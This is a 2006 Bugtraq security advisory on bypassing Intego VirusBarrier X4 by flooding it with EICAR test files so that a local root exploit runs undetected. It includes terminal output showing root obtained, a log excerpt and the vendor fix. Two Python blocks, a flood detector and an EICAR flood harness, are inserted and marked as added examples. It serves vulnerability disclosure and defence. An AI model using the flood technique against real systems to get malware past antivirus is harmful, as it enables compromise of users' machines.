Message-ID: <455A0BBD.8020200@digitalmunition.com>
Date: Tue, 14 Nov 2006 13:32:29 -0500
From: "K F (lists)" <kf_lists@...italmunition.com>
To: bugtraq@...urityfocus.com
Subject: [Fwd: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit']
I think the list spam trap ate this message a few weeks ago.
Message-ID: <45528089.9070802@...italmunition.com>
Date: Wed, 08 Nov 2006 20:12:41 -0500
From: "K F (lists)" <kf_lists@...italmunition.com>
To: bugtraq@...urityfocus.com
Subject: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
This was supposed to go out on Halloween but it didn't... but either way
all you Mac users can get scared or something. OOGA BOOGA!
[Attachment: pwntego.tar.gz]
[Attachment: DMA[2006-1031a].txt, reproduced below]
DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References:
http://www.digitalmunition.com/DMA[2006-1031a].txt
Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the
leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming
from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet
or other types of networks.
Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and
writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With
Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against
viruses of all kinds.
Although VirusBarrier does a pretty good job of halting malicious activity, the product currently suffers from a flaw related to the
number of alerts that it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very
short amount of time, he or she may be able to cause VirusBarrier to completely ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further spreading of malware.
As an example we will show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then
we will demonstrate how the VirusBarrier protection can be bypassed by using a simple flood of EICAR test files.
Any typical attempt to access or execute a file or program that matches a VirusBarrier definition results in an alert on the
user interface. There is a sweet-looking insulin bottle on the screen that slowly empties as the virus nears eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do ('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
On the other hand, if you choose 'Repair' the process is terminated dead in its tracks and the file is nulled out (truncated to zero bytes):
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how VirusBarrier is supposed to work. Under normal circumstances this would be adequate to stop a
malicious attack.
If, however, an attacker floods the file system with dummy virus files at a quick rate, the VirusBarrier software will promptly stop
responding after presenting the user with a few audible and visual alerts. After roughly 40 infected files in a row the
system becomes confused, and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files.)
When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following:
'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
From the attacker's standpoint the exploitation is fairly quick and simple. Our example uses a local root exploit; however, this tactic
could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a
precursor to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A, B, C and D would
then be completely useless and an E variant would be born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied
In the above example 'OSX.ExploitMachex.A' is being executed on a machine that is actively protected by VirusBarrier. In a matter of
seconds the Intego engine is flooded and the attacker has the ability to completely ignore any Intego virus and malware definitions.
One fun side effect of this attack is that the user must manually dismiss a number of alerts. The user is either forced to wait for
each alert to time out on its own after several seconds or to respond individually to each one.
This attack has a fairly obvious signature in syslog if the attacker is making use of the example code provided in this text.
Obviously, using a mix of different malware samples and better-randomized locations and names is a possible vector for a crafty attacker.
virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
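The burst pattern above is the signature a defender would key on. The following is an added example, not code from the advisory or from pwntego: a small Python detector that parses vbmgvx.log lines in the format shown, flags any run of at least 20 detections (the limit Intego confirmed) inside a trailing window, and counts how many of the flagged files carry the Perl rand()-style names the example flood uses. The 5-second window is an assumption chosen because the log above shows about 20 files in 3 seconds; the sample log is constructed here, not copied from the victim host.

```python
import random
import re
from collections import deque
from datetime import datetime, timedelta
from pathlib import PurePosixPath

# One vbmgvx.log line, in the format shown in the advisory:
#   Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.1623085 by EICAR Test
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) - "
    r"File infected: (?P<path>.+?) by (?P<sig>.+)$"
)
# Names produced by Perl's rand(), as used by the example flood code (e.g. 0.92815455662033).
RAND_NAME_RE = re.compile(r"^\d+\.\d+$")


def parse_line(line):
    """Return {'ts', 'path', 'sig'} for an infection line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # Collapse the space-padded day ("Nov  1") before handing it to strptime.
    ts = datetime.strptime(re.sub(r" +", " ", m["ts"]), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "path": m["path"], "sig": m["sig"]}


def summarize(burst):
    """Condense one burst of events into a single finding."""
    return {
        "start": burst[0]["ts"],
        "end": burst[-1]["ts"],
        "count": len(burst),
        "signatures": sorted({e["sig"] for e in burst}),
        "random_names": sum(
            1 for e in burst if RAND_NAME_RE.match(PurePosixPath(e["path"]).name)
        ),
    }


def find_alert_floods(lines, threshold=20, window_seconds=5):
    """Flag every run of >= threshold detections that fall inside window_seconds.

    threshold defaults to the 20-file limit Intego confirmed; window_seconds is an
    assumed value (the advisory's flood logs roughly 20 files in 3 seconds).
    """
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    recent = deque()  # events inside the trailing window
    burst = None      # events of the burst currently being tracked
    findings = []
    for e in events:
        recent.append(e)
        cutoff = e["ts"] - timedelta(seconds=window_seconds)
        while recent[0]["ts"] < cutoff:
            recent.popleft()
        if len(recent) >= threshold:
            if burst is None:
                burst = list(recent)   # burst starts with everything still in the window
            else:
                burst.append(e)
        elif burst is not None:
            findings.append(summarize(burst))
            burst = None
    if burst is not None:
        findings.append(summarize(burst))
    return findings


def constructed_log():
    """Constructed sample (not from the advisory's host): one genuine detection,
    then a 22-file EICAR flood at eight files per second."""
    rng = random.Random(31)
    lines = ["Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A"]
    t0 = datetime(2006, 10, 31, 2, 3, 35)
    for i in range(22):
        ts = t0 + timedelta(seconds=i // 8)
        name = f"0.{rng.randrange(10**14, 10**15)}"
        lines.append(f"{ts:%a %b %d %H:%M:%S %Y} - File infected: /private/tmp/{name} by EICAR Test")
    return lines


if __name__ == "__main__":
    for finding in find_alert_floods(constructed_log()):
        print(finding)
```

Run it against a real log with `find_alert_floods(open("/var/log/vbmgvx.log").readlines())`. The `random_names` count is only a hint: as the advisory notes, a crafty attacker will pick better names, so the rate of detections per window is the part of the signature worth alerting on.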
With the current fixes in place, once VirusBarrier gets 19 alerts the next malware is simply quarantined until the administrator can
repair it. In our example, the additional processes get a permission error when they are executed.
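To re-test the flood described above against a patched install, here is an added reproduction harness in Python; it is not the pwntego code from the attachment. It drops EICAR files with Perl rand()-style names into a directory as fast as it can, then classifies what the on-access scanner did to each one using the three outcomes the text shows: file left intact, file nulled to zero bytes by 'Repair', or file gone. The 19-alert limit and the 40-file count come from the text; the function names, the target directory and the `delay` knob are mine. On a host without VirusBarrier every file stays intact, which is what the stand-alone run shows.

```python
import os
import random
import tempfile
import time
from pathlib import Path

# The 68-byte EICAR test string: every AV product is expected to flag it, which is
# why the advisory uses it as harmless flood fodder.
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def flood_eicar(directory, count=40, delay=0.0):
    """Drop `count` EICAR files named like Perl's rand() output (0.928154...) into
    `directory`; returns the paths in the order they were written.  `delay` (seconds
    between files, assumed knob) lets you find the rate at which the engine keeps up."""
    directory = Path(directory)
    directory.mkdir(parents=True, exist_ok=True)
    written = []
    for _ in range(count):
        p = directory / f"0.{random.randrange(10**14, 10**15)}"
        p.write_bytes(EICAR.encode("ascii"))
        os.chmod(p, 0o755)  # executable, like the dummy files the example code drops
        written.append(p)
        if delay:
            time.sleep(delay)
    return written


def classify_outcomes(paths):
    """Count what happened to each dropped file: 'intact' (still has content, so the
    engine let it through), 'nulled' (zero bytes, VirusBarrier's 'Repair'), or
    'missing' (removed or quarantined)."""
    result = {"intact": 0, "nulled": 0, "missing": 0}
    for p in map(Path, paths):
        if not p.exists():
            result["missing"] += 1
        elif p.stat().st_size == 0:
            result["nulled"] += 1
        else:
            result["intact"] += 1
    return result


def unblocked_after(paths, limit=19):
    """Files dropped after the first `limit` alerts that are still intact.  With the
    fix the advisory describes (quarantine after 19 alerts) this should be empty."""
    return [p for p in map(Path, paths[limit:]) if p.exists() and p.stat().st_size > 0]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        dropped = flood_eicar(d, count=40)
        print(classify_outcomes(dropped))
        print("still intact past the 19-alert limit:", len(unblocked_after(dropped)))
```

Point `flood_eicar` at `/private/tmp` (the location used in the text) on the machine under test and look at `unblocked_after` afterwards: a non-empty list means files past the limit were neither nulled nor quarantined, i.e. the flood still opened a window.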
Of course since everyone knows there is no malware for Macintosh this scenario would quite simply never be encountered..... *smirk*
The Intego staff were more than helpful and willing to address this issue in a timely fashion. After communications were established
this problem was addressed, and fixes were out the door to customers in a matter of 2 days. How about that for turnaround time!
Workaround:
Please update to the latest version of Intego Virus Barrier and the latest Vdefs.
http://www.intego.com/services/updates.asp?product=VirusBarrier
Intego has fixed this bug in the 2006/11/01 Vdef files.